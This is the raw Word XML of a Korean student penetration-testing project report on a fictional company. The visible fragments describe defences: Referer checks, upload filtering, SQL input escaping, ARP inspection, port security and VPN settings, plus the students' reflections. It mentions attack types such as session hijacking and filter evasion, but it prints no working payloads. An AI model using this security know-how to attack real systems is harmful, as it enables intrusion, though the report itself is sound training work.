      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringRefer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 저장 후 맨 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">처음부터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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 나오기 전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 xml:space="preserve">가 붙기 전)까지의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 xml:space="preserve">을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringRefer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변수에 저장한 후 정상적으로 접근했을 때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 xml:space="preserve">이전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 비교해서 일치하는 지 확인해서 에러 메시지를 출력하거나 정해진 페이지로 이동하도록 할 수 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 xml:space="preserve">위와 같은 방식 활용해서 정상적인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 xml:space="preserve">로 판단한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 도메인 제한을 더 넓게 하거나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반대로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중 일정 부분을 포함해서 더 세세한 부분까지 검사해서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 통한 요청의 유효성을 검사할 수도 있</w:t>
      </w:r>
      <w:r w:rsidR="00901DE7" w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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파일 업로드 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 업로드 되는 과정에서 마지막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자를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 xml:space="preserve">에 저장하는 코드를 삽입하고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 값이 업로드를 허용하면 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인지를 판단하는 과정을 통해서 공격에 이용 가능한 파일이 업로드 되는 것을 방지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 xml:space="preserve">인젝션을 이용한 인증 우회나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 시도해도 공격이 막히고 로그가 남는 것을 확인할 수 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t>XSS, CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6071B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">와 마찬가지로 암호화되어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 확인 불가능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 xml:space="preserve">을 이용하면 위 사진과 같은 결과 확인 가능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인증 우회 공격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우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로 전달 받은 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의 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따로 변수 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$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를 만들어서 저장하고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 앞 뒤 공백을 제거한 후 작은 따옴표가 있으면 그 앞에 역 슬래시를 추가한 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작은 따옴표 같이 공격에 이용될 가능성이 있거나 로그인 정책상 사용하지 않도록 되어있는 글자들은 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str_replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 미리 치환되거나 에러 처리 되도록 코딩을 할 수 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 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처리가 완료된 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">상태에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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 xml:space="preserve">가 아니라 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$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 xml:space="preserve">를 빈 문자열과 비교함으로써 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 xml:space="preserve">가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 xml:space="preserve">이 들어갔을 때 아이디에 입력 값이 있는데 아이디를 입력하라는 메시지가 뜨는 경우가 없도록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그리고 전달받는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의 길이는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도메인 규칙에 맞춰서 특정 길이 내로 제한을 두면 공격에 필요한 충분한 공간이 확보되지 않아 긴 명령어를 이용한 공격을 방지할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901DE7" w:rsidRDefault="00901DE7" w:rsidP="00901DE7">
      <w:pPr>
        <w:ind w:left="804"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(전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 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 때는 이미 처리가 되어 있지만 글 삭제의 경우 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글의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값이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 넘겨진 후 별다른 처리 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그대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 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사용 전 전 처리의 경우는 로그인 예시와 같이 보안 정책에 따라서 미리 처리할 수 있는데 그 후에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값이 따옴표로 묶이지 않고 그대로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 xml:space="preserve">문에서 사용되면서 따옴표 없이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값 입력 후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 xml:space="preserve">을 덧붙이는 방법 등과 같이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 가능성이 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따라서 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">문에 사용되는 모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는 입력 받은 뒤 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>전처리를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 하고 전처리 후 사용을 할 때 항상 숫자 형태인 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>paramater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>라고 하더라도 따옴표로 묶어서 처리를 하도록 하는 것이 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proofErr w:type="spellEnd"/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 xml:space="preserve">에서 한 것과 같이 따옴표나 문제가 될 만한 특수 기호를 처리하는 함수가 존재하기 때문에 그러한 함수를 사용해서 입력 받은 데이터를 전 처리하고 모든 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>paramerter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 따옴표로 묶어서 처리하는 방식이 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 처리 과정은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 xml:space="preserve">에 사용되는 특수 기호 들이나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 사용되는 단어 같은 경우 어떤 식으로 처리할 것인지 정책을 결정한 뒤 코드에 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단순히 문제가 될 만한 특수 기호나 명령어만 처리하는 것이 아니라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 우회해서 공격할 가능성을 고려해야 한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 들어 대소문자를 섞어서 공격하거나 주석이나 괄호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 등을 이용해서 보내는 데이터에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대상이 되는 문자열을 쪼개서 보내거나,</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL or Hex Encoding, %을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">이용한 우회 등을 시도할 수 있기 때문에 가능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방법을 숙지하고 이에 대한 전 처리를 해주거나 또는 그러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이 가능한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 보안 장비를 사용할 수도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미리 작성되어 있거나 사용자가 작성 해놓은 저장 프로시저 같은 경우도 공격자에게 노출이 될 경우 저장 프로시저를 이용한 공격이 있을 수 있기 때문에 이와 관련된 문자열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과정에서 고려할 필요가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 값의 크기 제한은 클라이언트에서 할 경우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서버나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 조작해서 서버에 보내는 방법이 있기 때문에 서버에서 체크하는 것이 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 xml:space="preserve">이나 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 오류 메시지가 직접 사용자에게 보이는 것이 아니라고 하더라도 문제 발생에 대한 메시지가 오류에 관련된 내용을 지나치게 상세하게 설명하고 있을 경우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 데이터를 처리하는 구조를 공격자가 추측하기 쉽게 도와줄 수 있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 오류와 관련된 내용은 어떤 것 때문에 문제가 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 기술하기보다 문제가 발생했음을 알리고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 이전 작업을 시도할 수 있도록 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이러한 노력을 했음에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등을 통해서 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 코드를 실행할 수 있는 조건이 되었을 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 행동을 제한할 수 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웹 서비스를 통해서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 명령을 실행할 때 서비스에 필요한 권한 말고 다른 권한이 없도록 권한을 세분화하고 불필요한 권한을 낮추는 작업도 만일에 공격을 당했다 하더라도 피해를 줄이거나 막을 수 있는 방법이 될 수 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 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탐지 방법으로는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 이용해 탐지 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 xml:space="preserve">서버들과 같은 네트워크에서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 xml:space="preserve">공격을 시도 했을 시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 xml:space="preserve">에 들어오는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 xml:space="preserve">들을 확인해보면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 확인할 수 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 xml:space="preserve">가 없는 네트워크라면 공격이 의심될 때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 xml:space="preserve">에서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 확인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이 때 동일한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 xml:space="preserve">C주소를 가지고 있는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 있다면 공격 의심 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 xml:space="preserve">Dynamic ARP Inspection]을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">사용해서 만들어진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 xml:space="preserve">와 비교해 매칭되는 아이피일 경우에만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 xml:space="preserve">를 통과시키도록 하게 만들면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 어느정도 방지할 수 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 xml:space="preserve">에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 xml:space="preserve">으로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 xml:space="preserve">을 등록하게 되면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 방지 할 수 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 xml:space="preserve">또는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 xml:space="preserve">의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 xml:space="preserve">주소를 확인하고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 xml:space="preserve">으로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 등록</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">하므로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 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공격이 의심된다면 먼저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 탐지 방법을 이용해 탐지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방어 방법으로는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 대한 방어 방법을 사용하고 추가로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 사용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 xml:space="preserve">기능은 출발지 주소를 확인했을 때 네트워크 내의 주소이지 않은 주소가 밖으로 나가는 것을 차단시켜 주는 기능을 하고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 대응책을 설정해놓으면 어느 정도 차단 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F6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 xml:space="preserve">을 방어하는 방법으로는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 사용하는 편이 좋음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 xml:space="preserve">과 같이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 엿보지만 관리의 목적으로 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 xml:space="preserve">설정은 관리자가 스위치상에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 xml:space="preserve">와 연결된 포트를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 xml:space="preserve">포트로 설정을 해주고 반대되는 포트에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 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E151D6" w:rsidRDefault="00E151D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">은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를 사용해 어느 정도 방어가 가능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설정은 먼저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 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를 사용해 학습 가능한 최대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 xml:space="preserve">주소를 설정해주고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 사용해 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 xml:space="preserve">명령어를 사용해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 동적으로 학습되도록하고 학습한 주소를 저장할 수 있도록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 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 xml:space="preserve">경로에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 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 관리자권한으로 수정해야 하는데 그를 위해 바로가기 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바로가기 생성 시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 xml:space="preserve">라고 쳐주면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 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 xml:space="preserve">네이버의 주소를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 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 xml:space="preserve">를 열어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으로 도메인에 대한 아이피 주소를 고정 후 공격대상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 공격 당한 페이지를 열어보면 공격 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 대한 방어 방법을 사용한다면 공격 방어 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방화벽에서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 눌러 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 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 설정 후 다시 공격을 시도했을 때 공격이 되지 않는 것을 볼 수 있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lastRenderedPageBreak/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 xml:space="preserve">취약점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 xml:space="preserve">취약점 공격에 대응하기 위해서는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 xml:space="preserve">서버의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 xml:space="preserve">파일을 열어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 xml:space="preserve">을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 수정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 후에는 서비스 재 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 xml:space="preserve">으로 돌아가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 공격 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 xml:space="preserve">공격 시도 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격 대상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 xml:space="preserve">로 가서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 xml:space="preserve">서버에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 접근 시도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3BD7EBAF" wp14:editId="65797CAD">
            <wp:extent cx="3598545" cy="1303020"/>
            <wp:effectExtent l="0" t="0" r="190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1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554" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="635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0" cy="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 xml:space="preserve">서버에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 xml:space="preserve">로 접근을 시도 한 후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 xml:space="preserve">으로 돌아가서 확인해보면 버전이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 xml:space="preserve">라서 읽어오지 못하는 것을 볼 수 있고 다시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 확인했을 때 버전이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 되지 않은 모습을 볼 수 있음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 xml:space="preserve">상태가 되지 않도록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 xml:space="preserve">에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 xml:space="preserve">으로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 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 xml:space="preserve">으로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 입력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 쉽게 알아채지 못하도록 숫자와 문자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 포함하여 복잡하게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 관리부의 네트워크만 허용을 해주고 다른 네트워크에서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 접근하게 되면 거부</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F6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lastRenderedPageBreak/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와 같은 네트워크에 구성되어 있던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 별개의 네트워크로 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EDD3268" wp14:editId="76E39978">
            <wp:extent cx="3598322" cy="2391507"/>
            <wp:effectExtent l="0" t="0" r="2540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75" cy="24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 xml:space="preserve">연결을 위해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서버 설정에서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 xml:space="preserve">연결에 사용자 지정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 허용 체크 후 미리 공유한 키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5B84A1" wp14:editId="00FC12D2">
            <wp:extent cx="3596252" cy="1708219"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635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99" cy="17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598785" cy="1487156"/>
            <wp:effectExtent l="0" t="0" r="1905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27" cy="14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lastRenderedPageBreak/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 xml:space="preserve">로 와서 사용하고 있던 가상 사설망 속성으로 들어가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종류를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 설정 후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 미리 공유한 키 입력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D05FC2" wp14:editId="4AF68725">
            <wp:extent cx="3594735" cy="1828800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43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설정 적용 후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 시도를 해보면 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 것 확인 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7168" cy="974690"/>
            <wp:effectExtent l="0" t="0" r="381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36" cy="9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2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연결 과정을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 xml:space="preserve">로 확인해보면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 암호화 통신 하는 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F6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82B4F" w:rsidRDefault="00706A82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706A82">
      <w:pPr>
        <w:ind w:left="80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지금까지 본 프로젝트에서 가상회사인 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Smile Gate Entertainment</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 대상으로 보안 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 모의 해킹과 그에 따른 대응 조치 설정을 진행하였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및 감사 정책 등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 사항 점검과 시스템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 구분된 모의 해킹을 통해 취약점을 점검하고 대응책을 제시하였습니다.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 정책에서는 계정 관리에서 중요한 비밀번호에 대한 설정과 기본 계정인 관리자 및 게스트 계정에 대한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 따른 계정 분리 및 권한 부여에 대해서 확인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 정책에서 필요한 로그를 기록하는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 일정에 대한 설정 등을 점검했습니다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 모의 해킹에서는 시스템 보안에서 공격자가 회사 내부 네트워크에 접근이 가능해진 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내부 네트워크에서 동작 중인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 xml:space="preserve">의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 확인하거나 서비스 중인 포트를 확인할 수 있다는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 보안에서는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 xml:space="preserve">설정이 되어 있어서 웹 서버에 대한 접속이 암호화 되어 있더라도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 의해서 세션 쿠키 값이 노출될 수 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그 쿠키 값을 이용해 요청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 변조해서 탈취한 계정의 권한을 사용하는 것이 가능하다는 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 이용해서 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 알아내는 공격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웹 보안과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 xml:space="preserve">보안과 관련해서는 웹 사이트에 값을 넘겨주는 과정에서 발생하는 취약점을 이용해서 서비스 이용자에게 공격을 하고 서비스 이용자가 자기도 모르게 자기 권한으로 공격자가 의도한 작업을 하게 하거나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 알아내는 등의 공격이 가능한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마지막으로 네트워크 보안에서는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 xml:space="preserve">을 이용한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 xml:space="preserve">상태를 기반으로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 xml:space="preserve">등 다양한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 가능했고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같은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>VPN Sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">과 같이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 암호화 관련 취약점에 대해서 알아보았습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:ind w:left="794" w:firstLineChars="1" w:firstLine="2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프로젝트 과정에서 성공한 공격들에 대해서 방어에 필요한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 확인하고 사용 가능한 보안 장비를 이용해서 공격을 방어하는 방법과 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등을 통해서 공격에 대응하는 방법을 확인했습니다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 및 한계</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:ind w:left="76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 통해 알게 된 내용으로 점검할 취약점 목록을 설정하고 방어 방법을 종합적으로 테스트 할 수 있었다는 점에서 프로젝트의 의의를 찾을 수 있다고 생각합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 지식이 부족해 가상회사를 설정했음에도 특정 산업에 특징을 반영하여 점검이 이루어지지 못했다는 점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 내용들도 전부 적용해서 프로젝트를 진행하지는 못한다는 점은 아쉽게 느껴집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 다시 프로젝트를 기획한다면 가상으로 설정한 회사가 속한 산업에서 일반적으로 이루어지는 보안 설정들을 파악해서 해당 산업에 중요하게 다루어야 할 부분을 집중적으로 다루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 전부터 공격이 이루어져서 현재는 대부분 방어가 되어 있는 내용보다 최근에 많이 이루어지는 해킹 방법들을 알아보고 적용해보는 작업을 포함하는 것이 더 의미 있는 프로젝트가 될 것이라고 생각합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRDefault="00706A82">
      <w:r>
        <w:br w:type="page"/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프로젝트를 통해서 느낀 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개월 동안 수업 내용을 따라가고 시험 보기에 급급하다가 전체적으로 정리해볼 수 있는 시간이 된 것 같아서 좋았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 진행할수록 취약점 점검이나 대응에 있어서 배운 내용 외에는 아는 게 없는데 아는 것 만으로는 부족하다는 느낌이 많이 들어서 아쉬움이 남는다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00E858A2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6개월 동안 수업을 진행하면서 전에는 알지 못했던 공격방법이나 방어방법에 대해 많은 것을 배울 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있었는데 이번 프로젝트를 하면서 </w:t>
      </w:r>
      <w:r w:rsidR="00DD3493">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>수업시간에 놓쳤던 것들을 다시 돌아볼 수 있어 의미 있는 시간이었습니다.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00706A82" w:rsidRPr="00706A82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31" w:rsidRDefault="004F3E31" w:rsidP="009C7634">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004F3E31" w:rsidRDefault="004F3E31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31" w:rsidRDefault="004F3E31" w:rsidP="009C7634">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004F3E31" w:rsidRDefault="004F3E31" w:rsidP="009C7634">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w:rsidR="00C52CFE" w:rsidRPr="00C52CFE" w:rsidRDefault="00C52CFE" w:rsidP="00C52CFE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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C52CFE">
          <w:rPr>
            <w:rStyle w:val="af2"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidRPr="00C52CFE">
          <w:rPr>
            <w:rStyle w:val="af2"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>ttps://support.microsoft.com/ko-kr/help/3034016/ipc-share-and-null-session-behavior-in-windows</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w:rsidR="00E858A2" w:rsidRDefault="00E858A2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>
    <w:nsid w:val="13263A24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E64B80A"/>
    <w:lvl w:ilvl="0" w:tplc="B7108164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7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9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0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2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6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7">
    <w:nsid w:val="4B6932C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6464EA22"/>
    <w:lvl w:ilvl="0" w:tplc="89BA29FE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8">
    <w:nsid w:val="52677884"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="991899AA"/>
    <w:lvl w:ilvl="0" w:tplc="EAAC4F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9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0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1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658B5A6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C9E66FE"/>
    <w:lvl w:ilvl="0" w:tplc="5E16C66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>
    <w:nsid w:val="69455875"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38F2256E"/>
    <w:lvl w:ilvl="0" w:tplc="5270EC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6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8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0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>
    <w:nsid w:val="7B181805"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFBEC624"/>
    <w:lvl w:ilvl="0" w:tplc="D53E4AD8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32">
    <w:nsid w:val="7D656905"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA184896"/>
    <w:lvl w:ilvl="0" w:tplc="A10E05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8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="3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320C7"/>
    <w:rsid w:val="00144CF8"/>
    <w:rsid w:val="0019376E"/>
    <w:rsid w:val="001A2D88"/>
    <w:rsid w:val="001B30CB"/>
    <w:rsid w:val="001D043B"/>
    <w:rsid w:val="001E2DD9"/>
    <w:rsid w:val="00223C5C"/>
    <w:rsid w:val="00227DB7"/>
    <w:rsid w:val="00292EC7"/>
    <w:rsid w:val="002C1FCE"/>
    <w:rsid w:val="002E005F"/>
    <w:rsid w:val="002E08A0"/>
    <w:rsid w:val="0034182E"/>
    <w:rsid w:val="003626ED"/>
    <w:rsid w:val="00374C26"/>
    <w:rsid w:val="003C3D2C"/>
    <w:rsid w:val="003D651E"/>
    <w:rsid w:val="00430F0E"/>
    <w:rsid w:val="00463320"/>
    <w:rsid w:val="004837C6"/>
    <w:rsid w:val="004A6F7D"/>
    <w:rsid w:val="004B76C3"/>
    <w:rsid w:val="004D52EE"/>
    <w:rsid w:val="004F3E31"/>
    <w:rsid w:val="004F56F1"/>
    <w:rsid w:val="00502E0B"/>
    <w:rsid w:val="0054339C"/>
    <w:rsid w:val="0057576B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E7475"/>
    <w:rsid w:val="007F0889"/>
    <w:rsid w:val="0081286A"/>
    <w:rsid w:val="00846015"/>
    <w:rsid w:val="00863AB2"/>
    <w:rsid w:val="0089125C"/>
    <w:rsid w:val="00901DE7"/>
    <w:rsid w:val="009167A9"/>
    <w:rsid w:val="00924F61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E0AB2"/>
    <w:rsid w:val="00C10F59"/>
    <w:rsid w:val="00C22A52"/>
    <w:rsid w:val="00C32B1E"/>
    <w:rsid w:val="00C37A0B"/>
    <w:rsid w:val="00C44DD4"/>
    <w:rsid w:val="00C52CFE"/>
    <w:rsid w:val="00C67042"/>
    <w:rsid w:val="00C90311"/>
    <w:rsid w:val="00C90AE2"/>
    <w:rsid w:val="00CC7E76"/>
    <w:rsid w:val="00CD0B2D"/>
    <w:rsid w:val="00CD5B99"/>
    <w:rsid w:val="00D326E0"/>
    <w:rsid w:val="00DA2618"/>
    <w:rsid w:val="00DB196F"/>
    <w:rsid w:val="00DD3493"/>
    <w:rsid w:val="00DF439F"/>
    <w:rsid w:val="00E151D6"/>
    <w:rsid w:val="00E32B4B"/>
    <w:rsid w:val="00E858A2"/>
    <w:rsid w:val="00E95596"/>
    <w:rsid w:val="00E970E7"/>
    <w:rsid w:val="00EC2F84"/>
    <w:rsid w:val="00EC33A8"/>
    <w:rsid w:val="00EC5E68"/>
    <w:rsid w:val="00F02EC6"/>
    <w:rsid w:val="00F53793"/>
    <w:rsid w:val="00F82B4F"/>
    <w:rsid w:val="00FE565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0563C1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theme" Target="theme/theme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asp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/ko-kr/help/3034016/ipc-share-and-null-session-behavior-in-window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A3E00-77DD-4AC5-A165-A65CB07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5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Windows User</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-04T04:49:00Z</dcterms:created>
